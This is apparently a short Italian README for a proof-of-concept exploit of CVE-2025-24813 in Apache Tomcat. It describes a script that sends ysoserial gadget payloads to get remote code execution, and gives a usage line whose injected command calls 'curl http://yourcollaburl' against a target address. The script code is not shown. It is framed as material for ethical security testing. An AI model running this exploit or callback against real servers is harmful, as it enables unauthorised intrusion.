
Un PoC per CVE-2025-24813
CVE-2025-24813 riguarda Apache Tomcat: se si tratta di una versione vulnerabile e clamorosamente mal configurata, un attaccante può ottenere RCE con una sola GET e una sola POST.
Maggiori informazioni qui
Questo è lo script di Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang e Qi Deng tratto dal recente writeup, modificato per accettare un comando, generare tutti i gadget payload di ysoserial e inviarli al tuo target.
Condiviso nell'interesse del security testing etico.
Esempio di utilizzo:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 mostra lo script in azione, mentre genera i payload e li invia al target; nel riquadro di destra vediamo il listener di interact che viene chiamato.